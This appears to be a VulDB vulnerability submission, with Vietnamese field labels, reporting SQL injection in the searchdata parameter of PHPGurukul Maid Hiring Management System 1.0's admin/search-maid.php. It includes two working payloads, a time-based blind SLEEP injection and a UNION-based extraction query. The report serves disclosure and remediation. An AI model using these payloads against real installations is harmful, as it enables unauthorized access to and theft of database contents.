| tiêu đề | phpgurukul Maid Hiring Management System 1 SQL Injection |
|---|
| Mô tả | In the file search-maid.php located at /mhms/admin/search-maid.php, there is a possibility of performing SQL injection on the 'searchdata=&search=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the 'searchdata=' parameter is set to:
For time-based blind:
Payload: searchdata=1' AND (SELECT 8466 FROM (SELECT(SLEEP(5)))eZbX) AND 'cwWm'='cwWm&search=
For UNION query:
Payload: searchdata=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x4378486b6a667363775a59566d497747474953587958707855685272786c69496675697a776c5878,0x716b626271),NULL-- -&search= |
|---|
| Nguồn | ⚠️ https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/ |
|---|
| Người dùng | Havook (UID 71104) |
|---|
| Đệ trình | 28/12/2024 02:10 (cách đây 1 Năm) |
|---|
| Kiểm duyệt | 28/12/2024 17:16 (15 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 289705 [PHPGurukul Maid Hiring Management System 1.0 /admin/search-maid.php searchdata Tiêm SQL] |
|---|
| điểm | 20 |
|---|